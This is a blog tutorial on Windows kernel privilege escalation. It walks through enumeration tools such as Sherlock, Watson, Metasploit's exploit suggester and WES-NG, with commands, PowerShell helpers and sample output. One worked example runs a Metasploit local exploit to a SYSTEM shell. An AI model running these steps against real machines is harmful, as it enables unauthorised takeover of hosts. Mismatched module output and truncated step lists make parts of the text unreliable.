Windows Kernel Exploitation

There are several tools that check whether an unpatched Windows kernel is affected by known, publicly exploited vulnerabilities. The most notable ones are covered below.

Each of them has its pros and cons. I will discuss them one by one and what each may be useful for.

Sherlock
Sherlock is a PowerShell script written by a user who goes by rasta-mouse. The project can be found here. It only checks for a handful of older, well-known kernel exploits, so it is mainly useful against older Windows machines or CTF boxes. Currently the script checks for these exploits:

  • MS10-015 : User Mode to Ring (KiTrap0D)

To run the script, start PowerShell with the execution policy bypassed, import the module and call Find-AllVulns:

c:\> powershell -ep bypass
PS c:\> Import-Module .\Sherlock.ps1
PS c:\> Find-AllVulns
...snip...
Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       :
VulnStatus : Appears Vulnerable

The script runs every check it knows about and reports a VulnStatus for each. "Appears Vulnerable" is decided from the file version of the affected system binary, not by triggering the bug, so confirm a finding before relying on it. If you would like to manually exploit something that looks vulnerable, you can navigate here to get a list of pre-compiled exploits for these kernel versions. Often the entries link to an exploit on Exploit-DB that you can download and compile yourself.
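To make clear what a Sherlock-style "Appears Vulnerable" verdict actually rests on, here is an added PowerShell example of the underlying file-version comparison. It is not Sherlock's own code, and the patched version at the bottom is a placeholder chosen for illustration: real thresholds differ per OS build and come from the bulletin's file information, which is why Sherlock branches on OS version internally.

```powershell
# Added example, not Sherlock's own code: the file-version comparison that
# Sherlock-style checkers rely on. The patched version used at the bottom is a
# PLACEHOLDER for illustration, not a real fix level for any bulletin.

function Get-SystemFileVersion {
    param([Parameter(Mandatory = $true)][string]$Path)
    # VersionInfo is the PE version resource that a hotfix bumps when it
    # replaces the binary; build a [version] from the numeric parts instead of
    # parsing the free-text FileVersion string.
    $vi = (Get-Item -LiteralPath $Path -ErrorAction Stop).VersionInfo
    New-Object -TypeName System.Version -ArgumentList $vi.FileMajorPart, $vi.FileMinorPart, $vi.FileBuildPart, $vi.FilePrivatePart
}

function Test-FileBelowPatchedVersion {
    param(
        [Parameter(Mandatory = $true)][string]$Path,
        [Parameter(Mandatory = $true)][version]$PatchedVersion
    )
    # Compare as [version], never as strings: '6.1.7601.18000' sorts before
    # '6.1.7601.9999' as text even though it is the newer build.
    (Get-SystemFileVersion -Path $Path) -lt $PatchedVersion
}

# On 64-bit Windows a 32-bit PowerShell process is redirected from System32 to
# SysWOW64; the Sysnative alias reaches the real 64-bit binaries the kernel loaded.
$sys32 = if ([IntPtr]::Size -eq 4 -and (Test-Path "$env:SystemRoot\Sysnative")) {
    "$env:SystemRoot\Sysnative"
} else {
    "$env:SystemRoot\System32"
}
$win32k  = Join-Path $sys32 'win32k.sys'
$patched = [version]'6.1.7601.99999'   # PLACEHOLDER threshold, not a real fix level

$current = Get-SystemFileVersion -Path $win32k
if (Test-FileBelowPatchedVersion -Path $win32k -PatchedVersion $patched) {
    "Appears Vulnerable: $win32k is $current, fixed build is $patched"
} else {
    "Not Vulnerable: $win32k is $current (not below $patched)"
}
```

Two things worth keeping in mind when reading any such verdict: the comparison only proves the file predates a given build, so a backported or out-of-band fix that shipped a different version number produces a false positive, and a check run from a 32-bit shell on a 64-bit host without the Sysnative detour reads the WOW64 copy rather than the binary the kernel actually loaded.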

Watson
Watson is the successor to Sherlock. Sherlock is deprecated, while Watson is maintained by rasta-mouse and regularly receives new exploit checks. The pros of using Watson are more accurate results and an actively maintained project. Are there any cons? Kind of. Watson takes more setup before you can use it: it is written in C# rather than PowerShell, so you have to compile it yourself, and you have to target the .NET Framework version that is actually present on the target Windows machine, because the binary will not load on a host without a matching CLR. I will explain how to do this:

First you will need to find out which version of .NET Framework is installed on the target machine. The quickest check is to list the runtime folders under C:\windows\\framework\ (each vX.Y.ZZZZ folder is an installed runtime; on 64-bit Windows there is a matching Framework64 tree as well):

PS C:\windows\\framework\> dir
07/16/2016  09:23 AM    <DIR>          v1.0.3705
07/16/2016  09:23 AM    <DIR>          v1.1.4322
06/04/2018  02:07 PM    <DIR>          v2.0.50727
06/04/2018  02:07 PM    <DIR>          v3.0
06/04/2018  02:07 PM    <DIR>          v3.5
04/13/2019  10:44 AM    <DIR>          v4.0.30319

In this example the v4.0.30319 folder is present, so the target has the .NET 4 CLR installed. Note that every 4.x release (4.0 through 4.8) is an in-place upgrade that shares the v4.0.30319 folder, so the folder name alone does not tell you the exact 4.x version; an assembly built for .NET Framework 4.0 will, however, run on any of them. The v2.0.50727 folder is the CLR that hosts .NET 2.0, 3.0 and 3.5, which is what you would target if the v4.0.30319 folder were missing.
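To take the guesswork out of this step, here is an added PowerShell example (not part of Watson or of this post's original material) that enumerates the runtime folders under C:\Windows\Microsoft.NET and resolves the exact 4.x version from the Release value that Windows writes under HKLM\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full. The folder path and registry key are the standard Windows locations; the version table follows Microsoft's documented minimum Release values, where a greater-or-equal comparison is the intended use.

```powershell
# Added example, not from the Watson project: work out which CLRs the target
# has so Watson can be built against a framework version that will load there.

function Get-InstalledClrFolders {
    # Every runtime gets a vX.Y.ZZZZZ folder here; Framework64 holds the 64-bit
    # copies on x64 Windows. Only folders containing mscorlib.dll are real CLRs
    # (v3.0 and v3.5 are libraries layered on the v2.0.50727 CLR).
    $roots = @("$env:SystemRoot\Microsoft.NET\Framework", "$env:SystemRoot\Microsoft.NET\Framework64")
    foreach ($root in $roots) {
        if (-not (Test-Path $root)) { continue }
        Get-ChildItem -Path $root | Where-Object { $_.PSIsContainer -and $_.Name -like 'v*' } | ForEach-Object {
            New-Object PSObject -Property @{
                Root   = $root
                Folder = $_.Name
                HasClr = (Test-Path (Join-Path $_.FullName 'mscorlib.dll'))
            }
        }
    }
}

function ConvertFrom-NetFxRelease {
    param([Parameter(Mandatory = $true)][int]$Release)
    # Minimum Release values documented by Microsoft for each 4.x version;
    # pick the highest entry that is <= the installed Release value.
    $table = @(
        @{ Min = 533320; Version = '4.8.1' },
        @{ Min = 528040; Version = '4.8'   },
        @{ Min = 461808; Version = '4.7.2' },
        @{ Min = 461308; Version = '4.7.1' },
        @{ Min = 460798; Version = '4.7'   },
        @{ Min = 394802; Version = '4.6.2' },
        @{ Min = 394254; Version = '4.6.1' },
        @{ Min = 393295; Version = '4.6'   },
        @{ Min = 379893; Version = '4.5.2' },
        @{ Min = 378675; Version = '4.5.1' },
        @{ Min = 378389; Version = '4.5'   }
    )
    foreach ($row in $table) {
        if ($Release -ge $row.Min) { return $row.Version }
    }
    return '4.0 (Release value below any documented 4.5+ build)'
}

function Get-NetFx4Version {
    # .NET 4.0 RTM does not write the Release value at all; 4.5 and later do.
    $key = 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full'
    $release = (Get-ItemProperty -Path $key -Name Release -ErrorAction SilentlyContinue).Release
    if ($null -eq $release) {
        if (Test-Path $key) { return '4.0' }
        return $null   # no .NET 4 CLR at all: build Watson for 3.5 instead
    }
    ConvertFrom-NetFxRelease -Release $release
}

Get-InstalledClrFolders | Format-Table Root, Folder, HasClr -AutoSize
$v4 = Get-NetFx4Version
if ($v4) { "Exact .NET Framework 4.x version: $v4" } else { "No .NET 4 runtime; target .NET Framework 3.5" }
```

Do not rely on $PSVersionTable.CLRVersion for this decision: PowerShell 2.0 on Windows 7 runs on the 2.0 CLR even when .NET 4 is installed, so it reports the runtime hosting the shell, not the newest runtime on the box.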

Next you will need to download the project from the Watson GitHub page. The following steps need to be done on a Windows machine or VM with Visual Studio installed.

In Visual Studio, choose the option to open a folder and select the entire project folder. In the Solution Explorer on the right-hand side you will see a file called Watson.sln; double-click it to open the solution. Right-click the Watson project (step 1 in the image) and select Properties (step 2). Under Application (step 3), set the Target framework to the version that matches the target machine, which is .NET Framework 4.0 in our case.

We can now build the project; the output is Watson.exe, found in the bin folder (bin\Debug or bin\Release depending on the build configuration). Copy it over to the target machine and execute it:

C:\> .\Watson.exe
...snip...
[*] Appears vulnerable to MS13-005
[>] Description: Due to a problem with isolating window broadcast messages in the Windows kernel, an attacker can broadcast commands from a lower Integrity Level process to a higher Integrity Level process, thereby effecting a privilege escalation.
[>] Exploit:
[>] Notes: None.

For each finding Watson also names a suggested exploit and links to it. You can fetch those and compile them for the target machine, or use the list of pre-compiled exploits here.

Metasploit
With Metasploit, you need an open Meterpreter session on the target for this to work. The tools we are going to use are post-exploitation modules, that is, modules that run after you have your initial foothold on the machine.

The module we will be using is post/multi/recon/local_exploit_suggester

To run this module from an existing Meterpreter session:

meterpreter > run post/multi/recon/local_exploit_suggester SHOWDESCRIPTION=true
[*] Collecting local exploits for x86/windows...
[*] 28 exploit checks are being tried...
...snip...
[*] exploit/windows/local/ms13_081_track_popup_menu: The target is vulnerable.
...snip...

After we have a list of candidate exploits, we can search Exploit-DB for an exploit and compile it, check this list of pre-compiled exploits for Windows, or use the suggested Metasploit module. In the example above the suggester points at exploit/windows/local/ms13_081_track_popup_menu. To use it, background the Meterpreter session, load the module, set SESSION to the ID of that session and run it:

msf > use exploit/windows/local/ms13_081_track_popup_menu
msf exploit(windows/local/ms13_081_track_popup_menu) > options

Module options (exploit/windows/local/ms10_092_schelevator):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD                        no        Command to execute instead of a payload
   SESSION   1                yes       The session to run this module on.
   TASKNAME                   no        A name for the created task (default random)

msf exploit(windows/local/ms13_081_track_popup_menu) > run
[*] Started reverse TCP handler on
...snip...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Windows Exploit Suggester — Next Generation

Windows Exploit Suggester - Next Generation (WES-NG) takes the output of systeminfo from the target and compares the OS version and the list of installed hotfixes against its vulnerability database to work out which patches the host is likely missing. The project is updated frequently by the developer. The pros are that it is easy to use and kept up to date. One point that is often misunderstood: you do not need Python on the target. The only thing taken from the target is the text output of systeminfo, which is a built-in Windows command; wes.py itself runs on your own machine, where Python is available. First you will need to download a copy of the tool from here. The next steps are outlined pretty well on the documentation page, so I will copy them word for word here:

  1. Obtain the latest database of vulnerabilities by executing the command --update.

After the program has run, it will display a list of vulnerabilities and the link to each exploit. Because the tool infers what is missing from the hotfix list alone, expect false positives where a later cumulative update superseded the KB it is looking for; verify candidates against the actual file versions or a second tool before spending time on them. You can navigate to the page to download and compile the exploit yourself, or search here for a list of pre-compiled exploits that you can use.
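Since only the first step of the documented procedure survived on this page, here is the whole flow as an added PowerShell example (my own, not the WES-NG project's code). It assumes the repository is cloned into a wesng directory on your machine and that python3 is on PATH; the flag names --update, --impact, --exploits-only and --output are taken from the wesng README and should be checked against wes.py --help for the version you have.

```powershell
# Added example, not from the WES-NG project. Only the built-in systeminfo
# command runs on the target; Python and wes.py run on your own machine.

function Export-SystemInfoForWes {
    # Run this on the TARGET. It is exactly the README's `systeminfo > systeminfo.txt`,
    # executed through cmd.exe so the file is written the same way the tool expects
    # (Windows PowerShell's own > operator would write UTF-16 instead).
    param([string]$OutFile = '.\systeminfo.txt')
    cmd.exe /c "systeminfo > $OutFile"
    Get-Item -Path $OutFile
}

function Invoke-WesNg {
    # Run this on YOUR machine (pwsh works on Linux as well) after copying
    # systeminfo.txt over. $WesDir and $Csv are assumptions for this example.
    param(
        [Parameter(Mandatory = $true)][string]$SystemInfoFile,
        [string]$WesDir = '.\wesng',
        [string]$Csv = '.\wes-eop.csv'
    )
    $wes = Join-Path $WesDir 'wes.py'
    # Step 1 from the docs: refresh the local vulnerability database.
    python3 $wes --update
    # Remaining steps: feed the report in, keep only local privilege escalation
    # issues that have a public exploit, and save the full table as CSV.
    python3 $wes $SystemInfoFile --impact 'Elevation of Privilege' --exploits-only --output $Csv
}

# On the target:  Export-SystemInfoForWes -OutFile C:\Users\Public\systeminfo.txt
# On your box:    Invoke-WesNg -SystemInfoFile .\systeminfo.txt
```

Filtering on impact and public exploits is what makes the output usable on a real engagement: unfiltered, the tool lists every unpatched CVE for every Microsoft product it can see in the hotfix list, most of which are irrelevant to getting SYSTEM.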

I hope this post was useful. We went over several ways to find Windows kernel vulnerabilities and exploit them. A tool that works well in one situation may not work as well in another, so it never hurts to know more than one way to do something.



I am a Security Consultant and formerly worked at PayPal as a Penetration Tester. At night I teach Cyber Security at UTexas. OSCP

Recipe For Root
